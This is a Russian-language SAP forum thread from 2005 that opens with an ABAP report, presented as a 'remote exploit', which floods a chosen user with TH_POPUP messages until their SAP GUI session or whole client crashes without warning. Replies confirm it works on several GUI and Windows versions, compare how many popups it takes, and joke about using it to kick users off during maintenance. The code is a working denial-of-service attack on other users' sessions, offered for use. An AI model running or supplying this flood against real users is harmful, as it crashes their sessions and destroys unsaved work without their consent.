Текущее время: Пн, авг 04 2025, 10:42

Часовой пояс: UTC + 3 часа


Правила форума


ВНИМАНИЕ!

Вопросы по SAP Query и Quick View - сюда



Начать новую тему Ответить на тему  [ Сообщений: 68 ]  На страницу 1, 2, 3, 4, 5  След.
Автор Сообщение
 Заголовок сообщения: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Чт, окт 06 2005, 11:56 
Старший специалист
Старший специалист

Зарегистрирован:
Пт, ноя 12 2004, 10:44
Сообщения: 370
Откуда: Москва
не помню, публиковал или нет, но вот сей код вышибает режим у пользователя без предупреждений :) проверено на 4.6с + GUI up to 6.20. Иногда атакуемая машинка пищит :)

Code:
report z_gui_exploit.

parameters uname type sy-uname obligatory.
parameters text type sm04dic-popupmsg.
parameters times type i default 50.
parameters mandt type sy-mandt default sy-mandt.

start-of-selection.
  do times times.
  call function 'TH_POPUP'
    exporting
      client = mandt
      user = uname
      message = text
    exceptions                                                             
      user_not_found = 1
      others = 2.
  enddo.


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Чт, окт 06 2005, 12:06 
Гуру-модератор
Гуру-модератор
Аватара пользователя

Зарегистрирован:
Пн, окт 11 2004, 20:32
Сообщения: 2470
Пол: Мужской
клево :) 4.0b вылетает так же без вопросов

опаньки... попробовал на себе - вылетает даже не режим, а весь сапгуй падает, успев показать какое то окошко и тут же его закрыв :shock:

_________________
- Может ли настоящий мастер кунг-фу получить по морде?
- Настоящий мастер может все!


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Чт, окт 06 2005, 14:36 
Старший специалист
Старший специалист
Аватара пользователя

Зарегистрирован:
Вт, авг 17 2004, 08:55
Сообщения: 331
Откуда: Украина, г.Мариуполь
Пол: Мужской
Выполнять прогу можно в интерактивном режиме? С какими параметрами? У меня гуя не падает... :( Версия 6.40 патч 11 (или 13).


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Чт, окт 06 2005, 14:47 
Гуру-модератор
Гуру-модератор
Аватара пользователя

Зарегистрирован:
Пн, окт 11 2004, 20:32
Сообщения: 2470
Пол: Мужской
RoadRunner написал:
Выполнять прогу можно в интерактивном режиме? С какими параметрами? У меня гуя не падает... :( Версия 6.40 патч 11 (или 13).

из параметров я ввожу только имя пользователя (свое), версия гуя 6.20

ЗЫ. винда 2к :)

_________________
- Может ли настоящий мастер кунг-фу получить по морде?
- Настоящий мастер может все!


Последний раз редактировалось ArmAnn Пт, окт 07 2005, 09:58, всего редактировалось 1 раз.

Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Чт, окт 06 2005, 15:15 
Младший специалист
Младший специалист

Зарегистрирован:
Пт, окт 15 2004, 13:25
Сообщения: 94
Да, падает, видимо из-за нехватки ресурсов! Наверняка падает только в 9x винде которая страдает такой проблемой.
по крайней мере проверял с times = 50 - закрывается, а если поставить 20 то не падает, и соответственно выдает 20 окошек ....

_________________
Просто я программист ....


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт, окт 07 2005, 11:55 
Менеджер
Менеджер

Зарегистрирован:
Чт, янв 20 2005, 08:34
Сообщения: 573
Пол: Мужской
Цитата:
Да, падает, видимо из-за нехватки ресурсов! Наверняка падает только в 9x винде которая страдает такой проблемой.


На XP тоже падает. При 50.

При 10 не падает.
Точное число не стал искать.

_________________
Волю в кулак, мышцы в узду, работай себе и не ахай!


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Пн, окт 10 2005, 17:17 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
holocron написал(а):
не помню, публиковал или нет, но вот сей код вышибает режим у пользователя без предупреждений :) проверено на 4.6с + GUI up to 6.20. Иногда атакуемая машинка пищит :)

Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах ;).


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 06:56 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
holocron написал(а):
не помню, публиковал или нет, но вот сей код вышибает режим у пользователя без предупреждений :) проверено на 4.6с + GUI up to 6.20. Иногда атакуемая машинка пищит :)


:lol: :lol: :lol:
Злые вы....... Все-бы юзверю нагадить :twisted:
:D :D :D

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 06:59 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
Skif написал:
Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах ;).


А нафига ? Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-) :lol:

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 08:26 
Гуру-модератор
Гуру-модератор
Аватара пользователя

Зарегистрирован:
Пн, окт 11 2004, 20:32
Сообщения: 2470
Пол: Мужской
vvvictor написал:
Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-) :lol:


и этот человек кого то назвал злым :lol:

_________________
- Может ли настоящий мастер кунг-фу получить по морде?
- Настоящий мастер может все!


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 08:31 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
ArmAnn написал:
и этот человек кого то назвал злым :lol:

Сравни один TH_POPUP с предупреждением об отключении с возможностью завершить корректно работу и т.д. А потом просто блокирование все "нежелательных" на время системных работ с последующим автоматическим разблокированием и чистой воды флуд, пока ГУЙ не загнется :D :D :D

Необходимость таких мер я признаю, но вот по поводу инструментария готов поспорить :lol: :lol: :lol:

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 08:39 
Гость
vvvictor написал:
Skif написал:
Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах ;).


А нафига ? Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-) :lol:

да заблокирует ..это есть уже...вот выкинет, чтоб не долбать сообщениями и через sm04 не колбасится


Принять этот ответ
Вернуться к началу
  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 08:41 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
Anonymous написал(а):
vvvictor написал:
Skif написал:
Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах ;).


А нафига ? Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-) :lol:

да заблокирует ..это есть уже...вот выкинет, чтоб не долбать сообщениями и через sm04 не колбасится

Я это года два-три назад ваял - если память не изменяет - и выкидывает.....

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 08:42 
Гость
Anonymous написал(а):
vvvictor написал:
Skif написал:
Весёлая фуська - вставлю в "Палаш" - гасить пачкой особо рьяных юзеров при системных работах ;).


А нафига ? Могу поделиться своей прогой - отмечаешь кого и на какой период гасить и все....... В нужное время выкинет, заблокирует, а потом разблокирует :-) :lol:

да заблокирует ..это есть уже...вот выкинет, чтоб не долбать сообщениями и через sm04 не колбасится

погодь..она ж только в текущей инстанции будет пахать? или торможу?


Принять этот ответ
Вернуться к началу
  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Вт, окт 11 2005, 08:45 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
Anonymous написал(а):
погодь..она ж только в текущей инстанции будет пахать? или торможу?

Не помню, но некоторые вещи можно вырулить, например с client specify, если ты речь ведешь про мандант

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ Сообщений: 68 ]  На страницу 1, 2, 3, 4, 5  След.

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: Google [Bot]


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Перейти:  
cron
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Русская поддержка phpBB